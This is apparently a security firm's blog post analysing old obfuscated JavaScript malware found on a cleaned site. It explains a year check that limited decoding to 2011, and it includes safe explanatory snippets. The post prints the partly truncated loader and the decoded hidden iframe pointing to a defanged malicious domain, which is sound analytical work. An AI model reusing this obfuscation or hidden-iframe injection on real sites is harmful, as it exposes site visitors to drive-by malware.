Some sites stay infected, or are never properly cleaned, for years. Eventually they come to us and we clean them. It doesn’t matter whether the malware is old or new. But old malware can tell stories to those who can read it.

For example, in February 2017 we cleaned a site with infected JavaScript files. There was nothing special about it; everything was cleaned automatically. However, our analyst, Moe Obaid, decided to take a look at the removed code:



```javascript
date=new Date();var ar="pE=C r:]?me;...cw{ 'nBgNA>}h)ly";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f12,0,60,12,24,-33,...skipped...126,-63,69,-72,6,9,54,-105,-21,0,120]".replace(k.substr(0,1),'[');
pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);
e=e();ar2=e(ar2);s="";var pos=0;
for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);
```

The obfuscation was quite familiar, but this time my attention was drawn to the following line:

```javascript
pau="rn ev2010".replace(date.getFullYear()-1,"al");
```

For the code to deobfuscate itself, this expression must evaluate to "rn eval" so that the next statement builds "return eval". But `date.getFullYear()-1` only equals 2010 when the script runs in 2011, so this could only happen back in 2011! I had to slightly modify the code to deobfuscate it, which revealed this invisible iframe:

```html
<i f r a m e src='hxxp://g3service[.]ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQQHDQAMAg==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></i f r a m e>
```

Indeed, this malware was active back in June 2011, and the domain is now defunct.
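The year check on the `pau` line is easy to reproduce in isolation. The following sketch (meant for Node.js, not a browser session you care about) copies the loader's string literals into a hypothetical `buildKeyword()` helper and shows which `return` statement the loader would build in different years:

```javascript
// buildKeyword() is a hypothetical helper; the literals "rn ev2010",
// "al" and "retu" are copied from the loader.
function buildKeyword(year) {
  // replace() converts the number (year - 1) to a string, so "2010" is
  // found and swapped for "al" only when year is 2011.
  const pau = "rn ev2010".replace(year - 1, "al");
  return "retu" + pau;
}

for (const year of [2010, 2011, 2012, 2017]) {
  console.log(year, buildKeyword(year));
}
// 2010 return ev2010
// 2011 return eval
// 2012 return ev2010
// 2017 return ev2010

// In 2011 the generated function hands back the global eval function.
console.log(typeof new Function("", buildKeyword(2011))()); // function

// In any other year the body references an undefined variable and throws.
try {
  const getter = new Function("", buildKeyword(2017));
  getter();
} catch (err) {
  console.log(err.name); // ReferenceError
}
```

Because `e=e();` sits outside the loader's `try` block, that ReferenceError stops the script in every year except 2011, so the payload is never decoded.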

These facts are enough to tell us two things: the malware was designed to work only in 2011 (back then, hackers liked to use disposable domains for just a few days or even hours), and the site hadn’t been properly cleaned for more than five years. Since 2012, that defunct malware has been sitting there like a ghost from the past.
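For readers who want to reproduce this kind of analysis without executing the malware, the loader's decoding loop can be re-implemented without `eval`. This is an illustrative sketch, not the analyst's actual method: `decode()` is a hypothetical helper, and because the real `ar` and `ar2` strings are truncated in the sample, it runs on a made-up four-letter alphabet and offset list instead of the real payload.

```javascript
// Hypothetical eval-free version of the loader's decoding loop.
// alphabet plays the role of `ar`; offsetsSource plays the role of `ar2`.
function decode(alphabet, offsetsSource) {
  // The loader calls the undefined gserkewg() on purpose; its catch block
  // sets k = new Boolean().toString(), which is the string "false".
  const k = new Boolean().toString();
  // Swapping the first "f" for "[" turns the data into an array literal,
  // which we parse with JSON.parse instead of eval.
  const offsets = JSON.parse(offsetsSource.replace(k.substr(0, 1), "["));
  // parseInt("0asd") is 0, so each step is effectively offsets[i] / 3.
  const base = parseInt(k.replace("false", "0asd"));
  let pos = 0;
  let out = "";
  for (let i = 0; i < offsets.length; i++) {
    pos += base + offsets[i] / 3; // running (cumulative) index into alphabet
    out += alphabet.substr(pos, 1); // pick one character per step
  }
  return out; // the loader would pass this string to eval instead
}

// Made-up sample data, not taken from the real malware.
console.log(decode("ehlo", "f3,-3,6,0,3]")); // hello
```

Parsing the offset array with `JSON.parse` means no attacker-controlled text is ever executed, and the loader's final `e(s)` call, which would run the decoded payload, is replaced by simply returning the string.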